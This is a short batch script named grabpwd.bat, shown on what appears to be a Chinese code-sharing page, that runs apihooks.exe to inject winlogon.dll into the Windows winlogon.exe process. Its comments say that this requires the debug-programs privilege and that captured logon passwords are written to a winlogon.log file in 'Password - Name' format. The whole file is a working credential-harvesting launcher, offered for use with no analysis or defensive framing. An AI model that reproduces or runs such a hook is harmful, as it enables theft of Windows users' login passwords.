grabpwd.bat
来自「window编程,非常的好」· Batch 代码 · 共 8 行
BAT
8 行
@ECHO OFF
REM WinLogon is one of few protected processes where you can apply hooks via
REM W2K version but it lasts few seconds/minutes while WNT-2K version
REM applies hooks immediately.
REM Again: you have to have "Debug programs" privilege granted.
apihooks.exe -o winlogon.dll winlogon.exe
REM You will find winlogon.log with texts in the root directory of the drive
REM where Windows is installed. The record has format: "Password - Name".
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?